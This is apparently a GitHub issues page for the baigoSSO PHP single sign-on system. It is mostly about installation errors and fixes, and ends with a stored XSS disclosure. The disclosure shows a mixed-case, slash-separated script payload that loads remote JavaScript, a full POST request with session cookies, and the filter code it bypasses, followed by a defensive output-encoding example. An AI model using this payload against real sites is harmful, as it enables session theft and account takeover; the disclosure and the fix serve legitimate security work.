baigostudio / baigosso
Single sign-on system
Home Page: http://www.baigo.net/sso/
License: Apache License 2.0
The config directory has neither config.inc.sample.php nor runtime.php; running the installer reports an error.
I spent a whole morning trying to install SSO, only to find that it does not support PHP 7.1. When will PHP 7.1 be supported?
//define('BG_URL_ROOT', str_ireplace(DS, '/', str_ireplace($_SERVER['DOCUMENT_ROOT'], '', BG_PATH_ROOT))); // this line throws an error on Windows
define('BG_URL_ROOT', '/');
Does it support the standard SSO protocols: CAS, SAML, OAuth2, OIDC?
Unzipped it into the web root and visited http://xxx.com/install/
Database name error!
The database name you entered is incorrect. Either the database name is wrong or the configured user has no privileges on that database; contact your database server provider for details. Once you have the correct database information, reinstall the system.
To reinstall, perform the following steps:
Delete the file ./config/is_install.php
Rerun ./install/ctl.php
Environment: PHP 5.5.25 + Nginx + MySQL 5.5
I downloaded and installed the program on CentOS 7.2 with LAMP. The environment itself installs without problems, and the database connection and PHP both work perfectly, but the baigo_sso database connection check never passes, with the error: database not set up correctly x030404. I really don't know what else could be wrong.
$path = strtolower($path);
When installing to the database, the tables cannot be created
When will PHP 7 be supported?
Fatal error: Cannot unset $this in /ginkgo/core/captcha.class.php on line 256
Installs fine on Windows, but on Linux (BT panel, 宝塔面板) it always reports token error and captcha error
I finally found the fix: reading through the source, I saw that its sessions are stored in files, under runtime.
It turns out it does not create the runtime directory itself, so creating one manually is enough.
Hello, several fields such as user_contact are set to NOT NULL, which makes the "create administrator" step fail during installation.
https://github.com/baigoStudio/baigoSSO/blob/master/core/model/user.class.php#L40
Prompt shown when submitting the database information
An XSS vulnerability was discovered in baigoCMS.
There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form parameter (admin_nick) posted to
/public/console/profile/info-submit/
XSS payload: <sCRiPt/SrC=//your js>
POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa
__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E
Submit this form; after refreshing, you can see that our XSS statement was executed successfully.
File: app/ctrl/console/profile.ctrl.php, function infoSubmit, line 70. It filters the content of the input.
Continuing to follow this process:
Because the incoming argument is an array, it goes into the fillParam method at line 352.
At line 826 it enters the safe function to filter the input content.
It filters the input content against XSS and SQL injection, but we can bypass this.
Payload:
<sCRiPt/SrC=//js>
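The report above locates the defence at input time, where a filter keyed on known tag spellings misses the slash-separated, mixed-case form. As an added example (not baigoSSO's or the reporter's code), the PHP below contrasts a hypothetical blacklist filter with context-aware output encoding; the filter, the sample nicknames and the example.invalid URLs are constructed for illustration.

```php
<?php
// Hypothetical input-side blacklist standing in for a generic "safe" filter.
// Assumption: this is NOT baigoSSO's implementation; it only illustrates why
// stripping known tokens on input is not a reliable defence.
function blacklistFilter(string $value): string
{
    return str_ireplace('<script ', '', $value);
}

// Hardened approach: keep the stored value raw and encode it for the HTML
// context at the moment of output. ENT_QUOTES escapes both quote styles,
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the result.
function renderText(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Attribute values use the same encoder; the template must always quote them.
function renderNickInput(string $nick): string
{
    return '<input type="text" name="admin_nick" value="' . renderText($nick) . '">';
}

// Constructed sample nicknames (not from any real account): a benign value,
// a conventional tag, and the slash-separated, mixed-case form from the report.
$samples = [
    'plain nickname',
    '<script src="//example.invalid/x.js"></script>',
    '<sCRiPt/SrC=//example.invalid/x.js>',
];

foreach ($samples as $nick) {
    $filtered = blacklistFilter($nick);
    printf("input    : %s\n", $nick);
    printf("filtered : %s (still contains '<': %s)\n",
        $filtered, strpos($filtered, '<') !== false ? 'yes' : 'no');
    printf("rendered : %s\n", renderText($nick));
    printf("attribute: %s\n\n", renderNickInput($nick));
}
```

With encoding applied at output, the browser shows the nickname as literal text rather than parsing it as a tag, so how many tag spellings the input filter recognises no longer decides the outcome.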